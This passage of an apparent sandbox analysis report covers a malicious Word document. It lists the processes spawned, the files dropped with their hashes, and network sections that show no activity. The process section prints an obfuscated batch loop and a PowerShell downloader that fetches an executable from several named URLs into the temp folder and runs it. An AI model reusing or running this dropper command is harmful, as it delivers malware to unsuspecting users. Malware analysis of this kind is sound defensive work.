14,62,51,1,76,31,27,77,7,69,32,11,33,56,32,1,10,40,31,31,31,22,60,6,78,62,35,6,3,45,52,14,35,39,47,1,10,37,4,31,7,57,51,1,14,4,31,54,7,69,73,1,55,4,40,77,42,34,50,27,36,4,31,34,73,41,17,51,47,47,43,39,11,44,41,11,39,66,51,1,14,4,31,54,7,69,22,35,39,62,16,11,12,51,44,16,39,51,77,7,7,7,7,69,51,32,41,62,30,6,63,39,44,41,11,39,66,51,1,14,4,31,54,7,73,1,78,40,31,31,54,42,34,63,54,7,31,54,34,73,55,33,39,3,63,73,28,28,64,3,11,64,12,32,28,28,1,6,4,4,7,42,34,76,37,31,7,54,34,73,80)do set vq=!vq!!Zz3p:~%0,1!&&if %0 geq 80 echo !vq:~4!|FOR /F "delims=AlED tokens=3" %Q IN ('assoc^^^|findstr llCm')DO %Q "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3628C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $o8292='z5512';$j1555=new-object Net.WebClient;$q5340='http://afordioretails.com/Khp3xNuXqRmrbdu@http://drapart.org/FqGR6B9HwLT_OooI9s@http://allopizzanuit.fr/1DIR7Hub_v0@http://www.apresearch.in/ztesjGJ4KKy_CxNxxH@http://sarahleighroddis.com/AVjjaUAheLfH361x_jvv'.Split('@');$m5383='r1972';$z3585 = '883';$t9777='p9902';$i7560=$env:temp+'\'+$z3585+'.exe';foreach($j8750 in $q5340){try{$j1555.DownloadFile($j8750, $i7560);$b714='u3975';If ((Get-Item $i7560).length -ge 40000) {Invoke-Item $i7560;$w1556='k6056';break;}}catch{}}$o770='q8506';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3696C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=AlED tokens=3" %Q IN ('assoc^|findstr llCm') DO %Q "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2140C:\Windows\system32\cmd.exe /c assoc|findstr llCmC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2332C:\Windows\system32\cmd.exe /S /D /c" assoc"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2428findstr llCmC:\Windows\system32\findstr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (QGREP) Utility
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 036
Read events
633
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
2
Unknown types
4

Dropped files

PID
Process
Filename
Type
3056WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6840.tmp.cvr
MD5:
SHA256:
3056WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B40D03.jpg
MD5:
SHA256:
3056WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\0478911415250.doc.LNKlnk
MD5:65ABBFCE4282E080181D2D38E07DDB58
SHA256:DFC7BB53ADE7DDB0F3828E993FF2FF90CE958206B748A9925B540097799DEF33
3056WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:816D838DD39EF23A0CF3FE55EF9E2410
SHA256:D2D0C33DA810AD744CA4A599FDCF4BF27E42D4F20D1FBE7C349EBF75E254AB87
3056WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:9C5088C4C8578649BD2576738844C5EB
SHA256:68D8939116B80D323B03257325325049C470DF486D16CDB599985542D9416D5F
3056WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:2835914C447C507C61A37057AB92E8AE
SHA256:70AE687D376C8970A22424EB8B72EA729101C95DAE341C7A0CD6D1DEA53393AF
3056WINWORD.EXEC:\Users\admin\Desktop\~$78911415250.docpgc
MD5:ECF3FA492E3BA546667415EADD970A48
SHA256:70CE04E3C8B54F3D6BBBC344F550246C2725C128465BD657E5EFBCDDD5943F91
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info